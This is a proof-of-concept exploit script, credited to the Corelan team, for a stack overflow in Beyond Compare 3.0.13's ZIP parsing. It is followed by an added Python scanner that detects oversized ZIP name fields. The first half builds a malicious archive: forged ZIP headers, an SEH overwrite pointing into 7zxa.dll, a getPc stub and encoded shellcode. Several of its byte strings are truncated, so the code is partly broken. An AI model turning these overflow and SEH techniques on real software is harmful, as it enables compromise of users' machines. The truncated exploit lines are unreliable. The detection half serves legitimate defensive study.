Beyond Compare 3.0.13 b9599 (.zip) 0day Stack Buffer Overflow PoC exploit
Author: mr_me - http://net-ninja.net/
Download: http://es.kioskea.net/remote/download_get.php?ID=2321
Platform: Windows XP sp3
Advisory: http://www.corelan.be:8800/advisories.php?id=10-036
Patched in latest version and previous versions
Greetz to: Corelan Security Team
Thanks to rick2600 and corelanc0d3r for the getPc !
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !
Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
echo "
| __ __|
| _________________/ /___ _____ / /________ _____ ___|
|/ ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|
| http://www.corelan.be:8800 |
|security@corelan.be |
|-------------------------------------------------[ EIP Hunters ]--|
~~> Beyond compare 3.0.13 b9599 (.zip) BOF PoC exploit <~~";
// local file header
$lf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE".
// central directory file header
$cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7".
// end of central directory record
$efcdr_record = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
// corelan security team - msgbox
$sc = "VYhffffk4diFkDql02Dqm0D1CuEE5n3l0G3j3C0S1p02024B0W3y2G2u4D0k4q3c".
// Corelan's getPc routine
// 0424F020   EB 05          JMP SHORT 0424F027
// 0424F022   5E             POP ESI
// 0424F023   41             INC ECX
// 0424F024   FFD6           CALL ESI
// 0424F026   41             INC ECX
// 0424F027   E8 F6FFFFFF    CALL 0424F022
// ascii armoured & mangled
$getPc = "\x89\x05\x5e\x41\x98\x99\x41\x8a\x94\x98\x98\x98";
$sEh = "\x0d\x05\x01\x10"; // add esp, 8; retn --> 7zxa.dll
$trigger = "\x3a";
// build the PoC
$junk = str_repeat("\x41", 2064)."\x2e\x74\x78\x74";
$lol = str_repeat("\x41", 223)."\x41\x73\x06\x41".$sEh.$getPc.$sc;
$lol .= str_repeat("\x41",2062-strlen($lol)).$trigger."\x2e\x74\x78\x74";
$_____boooom = $lf_header.$junk.$cdf_header.$lol.$efcdr_record;
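The PoC above forges all three ZIP records (local file header, central directory file header, end of central directory record) so that the file name field is thousands of bytes long. The following is an added detection-side example, not part of mr_me's script or Beyond Compare's code: a pure header walker that flags archives whose declared name lengths exceed a sane bound before any extraction code ever sees them. Assumptions: record layouts per the PKZIP APPNOTE, a 255-byte name limit chosen here, no data descriptors (general purpose flag bit 3) in the scanned archive, and the sample archive is constructed in the block itself.

```python
import struct
import zlib

# Signatures and fixed header sizes of the three ZIP records the PoC forges
# (layouts from the PKZIP APPNOTE).
LOCAL_SIG, LOCAL_LEN = b"PK\x03\x04", 30
CENTRAL_SIG, CENTRAL_LEN = b"PK\x01\x02", 46
EOCD_SIG = b"PK\x05\x06"
MAX_NAME = 255  # assumed sane limit; the PoC's names are a couple of KB long

def scan_zip_names(data: bytes, max_name: int = MAX_NAME):
    """Walk local and central-directory headers by their length fields and
    return (record, offset, declared_name_len) for every name longer than
    max_name, plus (record, offset, None) for a header cut off by EOF.
    Only offsets are read, never entry contents, so nothing is extracted."""
    findings, pos = [], 0
    while pos + 4 <= len(data):
        sig = data[pos:pos + 4]
        if sig == LOCAL_SIG:
            kind, hdr = "local", LOCAL_LEN
        elif sig == CENTRAL_SIG:
            kind, hdr = "central", CENTRAL_LEN
        else:
            break  # EOCD reached (or unknown bytes): nothing left to check
        if pos + hdr > len(data):
            findings.append((kind, pos, None))
            break
        if kind == "local":
            # compressed size, uncompressed size, name length, extra length
            csize, _, nlen, xlen = struct.unpack_from("<IIHH", data, pos + 18)
            skip = nlen + xlen + csize  # assumes no data descriptor (flag bit 3)
        else:
            nlen, xlen, clen = struct.unpack_from("<HHH", data, pos + 28)
            skip = nlen + xlen + clen
        if nlen > max_name:
            findings.append((kind, pos, nlen))
        pos += hdr + skip
    return findings

def build_zip(name: bytes, payload: bytes = b"") -> bytes:
    """Constructed sample: a single stored entry, for exercising the scanner."""
    crc, n = zlib.crc32(payload), len(payload)
    local = LOCAL_SIG + struct.pack("<HHHHHIIIHH", 20, 0, 0, 0, 0, crc, n, n, len(name), 0) + name + payload
    central = CENTRAL_SIG + struct.pack("<HHHHHHIIIHHHHHII", 20, 20, 0, 0, 0, 0, crc, n, n, len(name), 0, 0, 0, 0, 0, 0) + name
    eocd = EOCD_SIG + struct.pack("<HHHHIIH", 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd

if __name__ == "__main__":
    print(scan_zip_names(build_zip(b"A" * 300 + b".txt")))  # two findings
    print(scan_zip_names(build_zip(b"readme.txt", b"hi")))   # []
```

Both the local header and the central directory are checked because the PoC places an oversized name in each; a scanner that only reads the central directory would miss the first copy.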